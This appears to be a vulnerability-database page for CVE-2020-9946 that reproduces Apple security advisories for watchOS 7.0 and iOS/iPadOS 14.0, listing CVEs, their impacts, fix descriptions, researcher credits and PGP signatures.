fhqMR3CPf7QVG8mlYMQ57OT7iuQ4lYkFw9qGgPI4SGWiMWWVtUU=
=7kDq
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-11-13-6 Additional information for
APPLE-SA-2020-09-16-4 watchOS 7.0
watchOS 7.0 addresses the following issues. Information about the
security content is also available at
https://support.apple.com/HT211844.
CVE-2020-13434
CVE-2020-13435
CVE-2020-9991
Entry added November 12, 2020
SQLite
Available for: Apple Watch Series 3 and later
Impact: Multiple issues in SQLite
Description: Multiple issues were addressed by updating SQLite to
version 3.32.3.
Entry added November 12, 2020
Safari
We would like to acknowledge Andreas Gutmann (@KryptoAndI) of
OneSpan's Innovation Centre (onespan.com) and University College
London, Steven J. Murdoch (@SJMurdoch) of OneSpan's Innovation Centre
(onespan.com) and University College London, Jack Cable of Lightning
Security, Ryan Pickren (ryanpickren.com), Yair Amit for their
assistance.
Entry added November 12, 2020
Installation note:
Instructions on how to update your Apple Watch software are
available at https://support.apple.com/kb/HT204641
To check the version on your Apple Watch, open the Apple Watch app
on your iPhone and select "My Watch > General > About".
Alternatively, on your watch, select "My Watch > General > About"
| VAR-202010-1509 | CVE-2020-9946 | plural Apple Resource locking vulnerability in the product |
CVSS V2: 4.6 CVSS V3: 6.8 Severity: MEDIUM |
This issue was addressed with improved checks. This issue is fixed in iOS 14.0 and iPadOS 14.0, watchOS 7.0. The screen lock may not engage after the specified time period. plural Apple The product contains a resource locking vulnerability due to a flawed check.The screen may not be locked after the specified time. Apple watchOS could allow a local malicious user to bypass security restrictions, caused by an issue in the Phone component. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-11-13-3 Additional information for
APPLE-SA-2020-09-16-1 iOS 14.0 and iPadOS 14.0
iOS 14.0 and iPadOS 14.0 addresses the following issues. Information
about the security content is also available at
https://support.apple.com/HT211850.
AppleAVD
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9958: Mohamed Ghannam (@_simo36)
Assets
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker may be able to misuse a trust relationship to
download malicious content
Description: A trust issue was addressed by removing a legacy API.
CVE-2020-9979: CodeColorist of LightYear Security Lab of AntGroup
Entry updated November 12, 2020
Audio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
Audio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreAudio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Playing a malicious audio file may lead to arbitrary code
execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2020-9954: Francis working with Trend Micro Zero Day Initiative,
JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreCapture
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9949: Proteas
Entry added November 12, 2020
Disk Images
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9965: Proteas
CVE-2020-9966: Proteas
Entry added November 12, 2020
Icons
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to identify what other
applications a user has installed
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9773: Chilik Tamir of Zimperium zLabs
IDE Device Support
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
execute arbitrary code on a paired device during a debug session over
the network
Description: This issue was addressed by encrypting communications
over the network to devices running iOS 14, iPadOS 14, tvOS 14, and
watchOS 7.
CVE-2020-9992: Dany Lisiansky (@DanyL931), Nikias Bassen of Zimperium
zLabs
Entry updated September 17, 2020
ImageIO
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9961: Xingwei Lin of Ant Security Light-Year Lab
Entry added November 12, 2020
ImageIO
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9876: Mickey Jin of Trend Micro
Entry added November 12, 2020
IOSurfaceAccelerator
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2020-9964: Mohamed Ghannam (@_simo36), Tommy Muir (@Muirey03)
Kernel
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
inject into active connections within a VPN tunnel
Description: A routing issue was addressed with improved
restrictions.
CVE-2019-14899: William J. Tolley, Beau Kujath, and Jedidiah R.
Crandall
Entry added November 12, 2020
Keyboard
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: A logic issue was addressed with improved state
management.
CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany
libxml2
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted file may lead to arbitrary
code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9981: found by OSS-Fuzz
Entry added November 12, 2020
Mail
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to unexpectedly alter
application state
Description: This issue was addressed with improved checks.
CVE-2020-9941: Fabian Ising of FH Münster University of Applied
Sciences and Damian Poddebniak of FH Münster University of Applied
Sciences
Entry added November 12, 2020
Messages
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to discover a user’s deleted
messages
Description: The issue was addressed with improved deletion.
CVE-2020-9988: William Breuer of the Netherlands
CVE-2020-9989: von Brunn Media
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-13520: Aleksandar Nikolic of Cisco Talos
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2020-6147: Aleksandar Nikolic of Cisco Talos
CVE-2020-9972: Aleksandar Nikolic of Cisco Talos
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9973: Aleksandar Nikolic of Cisco Talos
NetworkExtension
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to elevate privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9996: Zhiwei Yuan of Trend Micro iCore Team, Junzhi Lu and
Mickey Jin of Trend Micro
Entry added November 12, 2020
Phone
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: The screen lock may not engage after the specified time
period
Description: This issue was addressed with improved checks.
CVE-2020-9946: Daniel Larsson of iolight AB
Quick Look
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious app may be able to determine the existence of
files on the computer
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9963: Csaba Fitzl (@theevilbit) of Offensive Security
Entry added November 12, 2020
Safari
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to determine a user's
open tabs in Safari
Description: A validation issue existed in the entitlement
verification.
CVE-2020-9977: Josh Parnham (@joshparnham)
Entry added November 12, 2020
Safari
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Visiting a malicious website may lead to address bar spoofing
Description: The issue was addressed with improved UI handling.
CVE-2020-9993: Masato Sugiyama (@smasato) of University of Tsukuba,
Piotr Duszynski
Entry added November 12, 2020
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to view senstive user information
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2020-9969: Wojciech Reguła of SecuRing (wojciechregula.blog)
Entry added November 12, 2020
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to access restricted
files
Description: A logic issue was addressed with improved restrictions.
CVE-2020-9968: Adam Chester (@_xpn_) of TrustedSec
Entry updated September 17, 2020
Siri
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A person with physical access to an iOS device may be able to
view notification contents from the lockscreen
Description: A lock screen issue allowed access to messages on a
locked device.
CVE-2020-9959: an anonymous researcher, an anonymous researcher, an
anonymous researcher, an anonymous researcher, an anonymous
researcher, Andrew Goldberg The University of Texas at Austin,
McCombs School of Business, Meli̇h Kerem Güneş of Li̇v College, Sinan
Gulguler
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2020-13434
CVE-2020-13435
CVE-2020-9991
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to leak memory
Description: An information disclosure issue was addressed with
improved state management.
CVE-2020-9849
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Multiple issues in SQLite
Description: Multiple issues were addressed by updating SQLite to
version 3.32.3.
CVE-2020-15358
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A maliciously crafted SQL query may lead to data corruption
Description: This issue was addressed with improved checks.
CVE-2020-13631
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2020-13630
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9947: cc working with Trend Micro Zero Day Initiative
CVE-2020-9950: cc working with Trend Micro Zero Day Initiative
CVE-2020-9951: Marcin 'Icewall' Noga of Cisco Talos
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to code
execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9983: zhunki
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
Wi-Fi
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A logic issue was addressed with improved state
management.
CVE-2020-10013: Yu Wang of Didi Research America
Entry added November 12, 2020
Additional recognition
App Store
We would like to acknowledge Giyas Umarov of Holmdel High School for
their assistance.
Audio
We would like to acknowledge JunDong Xie and XingWei Lin of Ant-
financial Light-Year Security Lab for their assistance.
Entry added November 12, 2020
Bluetooth
We would like to acknowledge Andy Davis of NCC Group and Dennis
Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for
their assistance.
CallKit
We would like to acknowledge Federico Zanetello for their assistance.
CarPlay
We would like to acknowledge an anonymous researcher for their
assistance.
Clang
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Entry added November 12, 2020
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
debugserver
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
iAP
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
iBoot
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero,
Stephen Röttger of Google for their assistance.
Entry updated November 12, 2020
libarchive
We would like to acknowledge Dzmitry Plotnikau and an anonymous
researcher for their assistance.
lldb
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
Entry added November 12, 2020
Location Framework
We would like to acknowledge Nicolas Brunner
(linkedin.com/in/nicolas-brunner-651bb4128) for their assistance.
Entry updated October 19, 2020
Mail
We would like to acknowledge an anonymous researcher for their
assistance.
Entry added November 12, 2020
Mail Drafts
We would like to acknowledge Jon Bottarini of HackerOne for their
assistance.
Entry added November 12, 2020
Maps
We would like to acknowledge Matthew Dolan of Amazon Alexa for their
assistance.
NetworkExtension
We would like to acknowledge Thijs Alkemade of Computest and ‘Qubo
Song’ of ‘Symantec, a division of Broadcom’ for their assistance.
Phone Keypad
We would like to acknowledge Hasan Fahrettin Kaya of Akdeniz
University, an anonymous researcher for their assistance.
Entry updated November 12, 2020
Safari
We would like to acknowledge Andreas Gutmann (@KryptoAndI) of
OneSpan's Innovation Centre (onespan.com) and University College
London, Steven J. Murdoch (@SJMurdoch) of OneSpan's Innovation Centre
(onespan.com) and University College London, Jack Cable of Lightning
Security, Ryan Pickren (ryanpickren.com), Yair Amit for their
assistance.
Entry added November 12, 2020
Safari Reader
We would like to acknowledge Zhiyang Zeng(@Wester) of OPPO ZIWU
Security Lab for their assistance.
Entry added November 12, 2020
Security
We would like to acknowledge Christian Starkjohann of Objective
Development Software GmbH for their assistance.
Entry added November 12, 2020
Status Bar
We would like to acknowledge Abdul M. Majumder, Abdullah Fasihallah
of Taif university, Adwait Vikas Bhide, Frederik Schmid, Nikita, and
an anonymous researcher for their assistance.
Telephony
We would like to acknowledge Onur Can Bıkmaz, Vodafone Turkey
@canbkmaz, Yiğit Can YILMAZ (@yilmazcanyigit), an anonymous
researcher for their assistance.
Entry updated November 12, 2020
UIKit
We would like to acknowledge Borja Marcos of Sarenet, Simon de Vegt,
and Talal Haj Bakry (@hajbakri) and Tommy Mysk (@tommymysk) of Mysk
Inc for their assistance.
Web App
We would like to acknowledge Augusto Alvarez of Outcourse Limited for
their assistance.
WebKit
We would like to acknowledge Pawel Wylecial of REDTEAM.PL, Ryan
Pickren (ryanpickren.com), Tsubasa FUJII (@reinforchu), Zhiyang
Zeng(@Wester) of OPPO ZIWU Security Lab for their assistance.
Entry added November 12, 2020
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 14.0 and iPadOS 14.0".
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl+uxqgACgkQZcsbuWJ6
jjBhIhAAhLzDSjgjVzG0JLzEerhFBcAWQ1G8ogmIdxuC0aQfvxO4V1NriKzUcmsZ
UgQCEdN4kzfLsj3KeuwSeq0pg2CX1eZdgY/FyuOBRzljsmGPXJgkyYapJww6mC8n
7jeJazKusiyaRmScLYDwvbOQGlaqCfu6HrM9umMpLfwPGjFqe/gz8jyxohdVZx9t
pNC0g9l37dVJIvFRc1mAm9HAnIQoL8CDOEd96jVYiecB8xk0X6CwjZ7nGzYJc5LZ
A54EaN0dDz+8q8jgylmAd8xkA8Pgdsxw+LWDr1TxPuu3XIzYa98S1AsItK2eiWx8
pIhrzVZ3fk1w3+W/cSWrgzUq4ouijWcWw9dmVgxmzv9ldL/pS+wIgFsYLJm4xHAp
PH+9p3JmMQks9BWgr3h+NEcJwCUm5J7y0PNuCnQL2iKzn4jikqgfCXHZOidkPV3t
KjeeIFX30AGI7cUqhRl9GbRn8l5SA4pbd4a0Y5df1PgkDjSXxw91Z1+5S15Qfrzs
K8pBlPH37yU3aqMEvxBsN5Fd7vdFdA+pV/aWG5tw4pUlZJC25c50w1ZW0vrnsisg
/isPJqXhUWiGAfQ7s5W6W3AMs4PyvRjY+7zzGiHAd+wNkUNwVTbXvKP4W4n/vGH8
uARpQRQsureymLerXpVTwH8ZoeDEeZZwaqNHTQKg/M9ifAZPZUA=
=WdqR
-----END PGP SIGNATURE-----
.
Alternatively, on your watch, select "My Watch > General > About"